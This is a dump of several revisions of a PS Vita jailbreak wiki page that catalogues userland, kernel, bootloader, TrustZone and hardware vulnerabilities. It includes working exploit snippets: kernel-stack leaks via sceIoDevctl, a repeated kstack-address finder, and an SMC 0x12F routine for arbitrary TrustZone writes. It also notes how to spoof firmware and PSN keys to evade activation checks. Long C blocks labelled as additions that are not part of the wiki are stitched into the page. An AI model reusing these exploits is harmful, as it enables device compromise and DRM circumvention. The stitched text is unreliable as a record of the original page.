This can be used to partially defeat kASLR and, as an out-of-bounds primitive, to get kernel code execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least up to firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID is returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value makes finding the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, 0x400);<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);   // copy the fake voice definition onto the kernel stack<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // probe candidate kernel stack addresses until one is accepted as a voice definition<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition *)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF;<br />
}<br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10562Vulnerabilities2019-02-02T21:53:04Z<p>Xyz: /* octopus exploit */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. The bug was implemented by TheFloW in h-encore.<br />
<br />
The bug lies in the parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into a list of buffers. However, it doesn't validate the length, so if we place the \n delimiter far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. It is in the data section instead, but luckily for us the content after the buffer is the list that holds the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
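The parser behaviour described above, as an added example that is not part of this wiki page nor of h-encore: a line-by-line savedata parser that performs the length check the game's parser lacks, plus an audit helper a validator could run over a save file before handing it to a parser without that check. The capacities LINE_CAP and MAX_LINES and the sample save texts are constructed for the demonstration; the game's real buffer sizes are not given on the page.<br />
<br />
```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Capacities chosen for the demonstration; the game's real sizes are not given. */
#define LINE_CAP  16    /* bytes per line buffer, including the terminating NUL */
#define MAX_LINES 8     /* entries in the list of line buffers */

/* Copies each '\n'-delimited line of `save` into its own buffer, as the game
 * does, but with the check the game lacks: a line that would not fit in
 * LINE_CAP bytes (or a file with more than MAX_LINES lines) is rejected.
 * Returns the number of lines stored, or -1 on rejection. */
int parse_save_lines(const char *save, size_t save_len,
                     char out[MAX_LINES][LINE_CAP])
{
    int n = 0;
    size_t start = 0;
    for (size_t i = 0; i <= save_len; i++) {
        if (i < save_len && save[i] != '\n')
            continue;
        size_t len = i - start;
        if (i == save_len && len == 0)
            break;                       /* file ended right after a '\n' */
        if (n >= MAX_LINES || len >= LINE_CAP)
            return -1;                   /* would overflow the buffer or the list */
        memcpy(out[n], save + start, len);
        out[n][len] = '\0';
        n++;
        start = i + 1;
    }
    return n;
}

/* Audit helper: length of the longest line, so a validator can reject a save
 * file before it reaches a parser that does not check line lengths. */
size_t longest_line(const char *save, size_t save_len)
{
    size_t longest = 0, cur = 0;
    for (size_t i = 0; i < save_len; i++) {
        if (save[i] == '\n') {
            if (cur > longest) longest = cur;
            cur = 0;
        } else {
            cur++;
        }
    }
    return cur > longest ? cur : longest;
}

/* Constructed sample saves (not real Bittersmile data). */
static const char GOOD_SAVE[] = "name=Hero\nlevel=12\nstage=3\n";
static const char OVERLONG_SAVE[] = "name=Hero\n" "AAAAAAAAAAAAAAAAAAAAAAAA" "\nstage=3\n";

int parse_demo_good(void)
{
    char lines[MAX_LINES][LINE_CAP];
    return parse_save_lines(GOOD_SAVE, sizeof(GOOD_SAVE) - 1, lines);
}

int parse_demo_overlong(void)
{
    char lines[MAX_LINES][LINE_CAP];
    return parse_save_lines(OVERLONG_SAVE, sizeof(OVERLONG_SAVE) - 1, lines);
}

int main(void)
{
    char lines[MAX_LINES][LINE_CAP];
    int n = parse_save_lines(GOOD_SAVE, sizeof(GOOD_SAVE) - 1, lines);
    for (int i = 0; i < n; i++)
        printf("line %d: %s\n", i, lines[i]);
    printf("overlong save -> %d (longest line %zu, cap %d)\n",
           parse_demo_overlong(),
           longest_line(OVERLONG_SAVE, sizeof(OVERLONG_SAVE) - 1), LINE_CAP - 1);
    return 0;
}
```
<br />
The rejection happens before any byte is copied, so a line that exceeds the buffer can never reach the list of destinations that follows it in memory.<br />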
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can secure PSVita's store as much as they want; we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call the functions you want to observe in a kernel context (i.e. some syscalls, for example sceIoOpen).<br />
Then call devctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 is not bounds-checked, so it indexes past the end of the syscall table and causes an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="c"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="c"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmware versions (at least until firmware 1.692) the voice definition address must not be xored, or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value allows the kstack address to be found faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to firmware 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
// exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // Fake voice definition; sceIoDevctl copies it onto the kernel stack<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // Probe one page at a time until the fake definition is accepted<br />
    // (the address is passed un-xored, as required on old firmwares)<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition *)addr;<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        return addr - DEVCTL_STACK_FRAME; // kernel stack base<br />
    }<br />
    return 0xFFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, which yields an out-of-bounds access without copying an oversized buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
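A 32-bit model of the two checks described in the two subsections above, as an added example that is not part of this wiki page nor of h-encore. The real layout of the Vita kernel memcpy is not given on the page, so the bodies of flawed_fits and signed_loop_iterations are assumptions that reproduce only the described behaviour: the first shows why dst + len wraps for a negative length and lets the bounds test pass, the second shows how a signed comparison skips the copy loop entirely, and hardened_fits / bounded_copy show the form of the check that rejects such a length before any arithmetic is done.<br />
<br />
```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the flawed bounds test (not the Vita kernel's actual code):
 * the end address is computed as dst + len in 32-bit arithmetic, so a negative
 * len (a huge unsigned value) wraps and the result compares as "small enough"
 * whether the comparison is signed or unsigned. */
bool flawed_fits(uint32_t dst, int32_t len, uint32_t region_end)
{
    uint32_t end = dst + (uint32_t)len;   /* wraps when len < 0 */
    return end <= region_end;             /* passes after the wrap */
}

/* Assumed model of the second bug: a copy loop guarded by a signed compare.
 * Returns how many iterations the loop would run; a negative len runs none,
 * which is what lets the negative-length call return without a huge copy. */
uint32_t signed_loop_iterations(int32_t len)
{
    uint32_t iterations = 0;
    for (int32_t remaining = len; remaining > 0; remaining--)
        iterations++;
    return iterations;
}

/* Hardened check: reject a negative length before doing any arithmetic and
 * compare the length against the remaining space instead of adding it to dst,
 * so no intermediate value can wrap. */
bool hardened_fits(uint32_t dst, int32_t len, uint32_t region_end)
{
    if (len < 0 || dst > region_end)
        return false;
    return (uint32_t)len <= region_end - dst;
}

/* Bounded copy built on the same rule. Returns bytes copied, or -1 on rejection. */
int bounded_copy(char *dst, size_t dst_cap, const char *src, int32_t len)
{
    if (len < 0 || (size_t)len > dst_cap)
        return -1;
    memcpy(dst, src, (size_t)len);
    return len;
}

/* Demo wrapper with a constructed 8-byte destination and sample source. */
int demo_bounded_copy(int32_t len)
{
    char dst[8] = {0};
    static const char src[] = "0123456789ABCDEF";   /* constructed sample */
    return bounded_copy(dst, sizeof(dst), src, len);
}

int main(void)
{
    printf("flawed_fits(0x1000, -16, 0x2000)   = %d (check bypassed)\n",
           flawed_fits(0x1000, -16, 0x2000));
    printf("hardened_fits(0x1000, -16, 0x2000) = %d\n",
           hardened_fits(0x1000, -16, 0x2000));
    printf("signed_loop_iterations(-16)        = %u\n",
           signed_loop_iterations(-16));
    printf("demo_bounded_copy(4)  = %d\n", demo_bounded_copy(4));
    printf("demo_bounded_copy(-1) = %d\n", demo_bounded_copy(-1));
    return 0;
}
```
<br />
The two flawed functions together are what make the negative length useful: the wrapped end address passes the size test, and the signed loop guard ensures the call returns quickly instead of copying until it faults. The hardened variant removes both conditions by validating the sign first and never adding an untrusted length to a pointer.<br />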
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovered a buffer overflow in NSBL that occurs during eMMC initialization: the eMMC MBR can be modified to change the block size. yifan tried to exploit it with an adjacent malloc(controlled_size), could not find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz found a way to exploit the buffer overflow. He discovered a logic flaw related to error code propagation in NSBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written is used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched after 1.80 and before 2.10.<br />
<br />
A list of the 1.80 TrustZone modules' imports/exports is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10561Vulnerabilities2019-02-02T21:51:21Z<p>Xyz: /* Hardware */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order for HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
